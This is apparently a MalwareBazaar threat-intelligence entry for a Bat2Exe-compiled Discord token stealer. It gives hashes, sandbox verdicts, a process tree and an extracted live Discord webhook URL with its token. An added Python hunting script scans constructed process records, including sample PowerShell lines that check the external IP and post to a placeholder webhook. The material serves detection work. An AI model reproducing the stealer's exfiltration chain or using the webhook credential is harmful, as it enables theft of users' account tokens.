MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat: unknown
Vendor detections: 10

SHA256 hash: 04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2
SHA3-384 hash: 1915eb5be329840a2f7d6c4a9e930536ddced756fd1beaa3442f4c4a24ce36e6da34c5007a943006b02460226046d1aa
SHA1 hash: 609221531540e07f89dcbcfea6332903614cf1ce
MD5 hash: 1bcbb999e7aad815efc1036324443310
humanhash: happy-fifteen-sad-winner
File name: 47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909
File size: 82'432 bytes
First seen: 2022-02-28 07:46:04 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: 60b73d3072a0d10df2e877c7d40aea75
ssdeep: 1536:2OXQrSji6XN9+GVqQ7zgN9ebqvjoJExemw2Dc:2OXQA+QqQfgNY0emj
Threatray: 1'270 similar samples on MalwareBazaar
TLSH: T19A831A5B236410DDC6A741B4CE61370AD7B1B0690F22A3CF0BB8C69A6F179E1AF78355
Reporter: struppigel
Tags: batch batch2exe cordimik DiscordTokenStealer exe powershell

Intelligence


File Origin
# of uploads: 1
# of downloads: 223
Origin country: n/a
Vendor Threat Intelligence

Result
Verdict: Suspicious
Maliciousness:
Behaviour:
  Creating a window
  Creating a file in the %temp% subdirectories
  Running batch commands
  Launching a process
  DNS request
  Sending a custom TCP request
  Sending an HTTP GET request
  Creating a file
  Creating synchronization primitives
  Creating a process from a recently created file
  Searching for the window

Result
Malware family: n/a
Score: 5/10
Tags: n/a
Behaviour (MalwareBazaar)
Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: shell32.dll
Result
Verdict: MALICIOUS
Details: Windows PE Executable. Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family: Malicious Packer
Verdict: Malicious
Result
Threat name: Unknown
Detection: malicious
Classification: troj.spyw.evad
Score: 80 / 100
Signature:
  Machine Learning detection for sample
  May check the online IP address of the machine
  Multi AV Scanner detection for submitted file
  Sigma detected: Check external IP via Powershell
  Sigma detected: Suspicious Script Execution From Temp Folder
  Uses ping.exe to check the status of other devices and networks
  Uses ping.exe to sleep
  Yara detected BatToExe compiled binary
Behaviour
Behavior Graph (ID 579649; sample 47ee7c873ff6ad620d68f6bd92c...; start date 28/02/2022; architecture WINDOWS; score 80), recovered from the rendered graph as a process tree:
  Top-level signatures: Multi AV Scanner detection for submitted file; Sigma detected: Check external IP via Powershell; Machine Learning detection for sample; 2 other signatures
  47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909.exe
    drops C:\Users\user\AppData\Local\...\Token.bat (ASCII)
    -> cmd.exe
         drops C:\Users\user\AppData\Local\Temp\bnt.ps1 (ASCII)
         signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
         -> cmd.exe
              signature: Uses ping.exe to sleep
              -> PING.EXE -> 192.168.2.7
              -> findstr.exe
         -> cmd.exe
              -> powershell.exe -> api.ipify.org (api.ipify.org.herokudns.com 52.20.78.240:80, AMAZON-AES, United States); signature: May check the online IP address of the machine
         -> powershell.exe
         -> 3 other processes -> discord.com (162.159.135.232:443, CLOUDFLARENET, United States)
    -> conhost.exe
Threat name: Win64.Infostealer.Disco
Status: Malicious
First seen: 2022-02-28 07:46:11 UTC
File Type: PE+ (Exe)
Extracted files: 2
AV detection: 11 of 28 (39.29%)
Threat level: 5/5
Result
Malware family: n/a
Score: 10/10
Tags: n/a
Behaviour:
  Delays execution with timeout.exe
  Runs ping.exe
  Suspicious behavior: EnumeratesProcesses
  Suspicious use of AdjustPrivilegeToken
  Suspicious use of WriteProcessMemory
  Looks up external IP address via web service
  Blocklisted process makes network request
Malware Config
Dropper Extraction: https://discord.com/api/webhooks/947523898352763001/gIjqjRvqoxzCBCvDzpPxPasv0cyqXR86gT3F-m2J9Jygqi1mA3x5pl_OEYm5QkgHToePoo
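The sandbox signatures above (Sigma "Check external IP via Powershell" and "Suspicious Script Execution From Temp Folder", the two ping.exe signatures) and the extracted Discord webhook describe a behaviour chain that is easy to hunt for in process-creation telemetry. The Python script below is an added example, not part of the MalwareBazaar entry or of any vendor's rule set: it runs those four heuristics over constructed Sysmon EventID 1-style records that mirror the reported process tree (cmd.exe launching a dropped Token.bat from Temp, ping.exe against loopback as a sleep, powershell.exe running bnt.ps1 and querying api.ipify.org, and a webhook POST). The sample name, paths, webhook ID and token in the records are made up, and the heuristics generalize the page's findings slightly: they match other common IP-check services and the ptb/canary/discordapp.com webhook hosts as well as discord.com.

```python
"""Hunting heuristics for the behaviour chain in this MalwareBazaar entry.

Added example, not part of the MalwareBazaar page or of any vendor's signature
set. It scans Sysmon EventID 1-style process-creation records for: script
execution from a Temp folder, an external IP lookup from PowerShell, ping.exe
used as a sleep (versus a genuine host check), and a Discord webhook URL.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class ProcEvent(NamedTuple):
    image: str    # full path of the created process
    parent: str   # full path of the parent process
    cmdline: str  # command line of the created process


# Constructed records that mirror the reported process tree. The sample name,
# paths and the webhook ID/token are made up; this is not captured telemetry.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Users\user\Desktop\sample.exe",
              r'cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4A2F\Token.bat""'),
    ProcEvent(r"C:\Windows\System32\PING.EXE",
              r"C:\Windows\System32\cmd.exe",
              "ping -n 6 127.0.0.1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\bnt.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              'powershell -c "(Invoke-WebRequest -UseBasicParsing http://api.ipify.org).Content"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              'powershell -c "Invoke-RestMethod -Method Post -Uri '
              'https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_TOKEN_0000 -Body $b"'),
    # Controls: a gateway ping is a host check (not a sleep), and a script run
    # from the user's Documents folder must not trip the Temp-folder rule.
    ProcEvent(r"C:\Windows\System32\PING.EXE",
              r"C:\Windows\System32\cmd.exe",
              "ping -n 4 192.168.2.1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell -File C:\Users\user\Documents\backup.ps1"),
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
IP_CHECK_HOSTS = ("api.ipify.org", "ipinfo.io", "icanhazip.com", "ifconfig.me", "checkip.amazonaws.com")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# Script files under the user or system Temp folder, as in the Sigma rule
# "Suspicious Script Execution From Temp Folder".
TEMP_SCRIPT_RE = re.compile(
    r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\[^\s\"]*\.(?:bat|cmd|ps1|vbs|js)\b", re.I)
# Discord webhook URLs on any of the front-end hosts; group 1 = webhook ID, group 2 = token.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify_ping(cmdline: str) -> Optional[str]:
    """'ping -n N 127.0.0.1' is the batch idiom for sleeping about N-1 seconds;
    pinging any other target is a genuine reachability check."""
    toks = cmdline.lower().split()
    if not toks or not basename(toks[0]).startswith("ping"):
        return None
    targets = [t for t in toks[1:] if not t.startswith("-") and not t.isdigit()]
    if any(t in LOOPBACK for t in targets):
        return "ping_sleep"
    return "ping_host_check" if targets else None


def find_webhooks(text: str) -> List[Tuple[str, str]]:
    """Return (webhook_id, token) pairs found in a command line or dropped script."""
    return [(m.group(1), m.group(2)) for m in WEBHOOK_RE.finditer(text)]


def scan(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Apply all four heuristics; returns (rule_name, detail) per hit."""
    hits = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent)
        if img in SCRIPT_HOSTS and TEMP_SCRIPT_RE.search(ev.cmdline):
            hits.append(("script_from_temp", ev.cmdline))
        if img in ("powershell.exe", "pwsh.exe") and any(h in ev.cmdline.lower() for h in IP_CHECK_HOSTS):
            hits.append(("powershell_external_ip_check", ev.cmdline))
        if img == "ping.exe" and parent == "cmd.exe":
            kind = classify_ping(ev.cmdline)
            if kind:
                hits.append((kind, ev.cmdline))
        for wid, _token in find_webhooks(ev.cmdline):
            hits.append(("discord_webhook", wid))  # record the ID, not the secret token
    return hits


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule:30} {detail}")
```

Run over the constructed records this yields six hits: two Temp-folder script launches (Token.bat via cmd.exe, bnt.ps1 via powershell.exe), one external IP check, one ping sleep, one ping host check against the gateway, and one webhook. `find_webhooks` is equally useful on the text of a dropped .bat or .ps1, which is where a Bat2Exe stub like this one keeps its webhook; treat the token half of the URL as a credential and report it to Discord rather than paste it into tickets.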
Unpacked files
SHA256 hash: 04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2
MD5 hash: 1bcbb999e7aad815efc1036324443310
SHA1 hash: 609221531540e07f89dcbcfea6332903614cf1ce
Please note that we are no longer able to provide a coverage score for VirusTotal.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments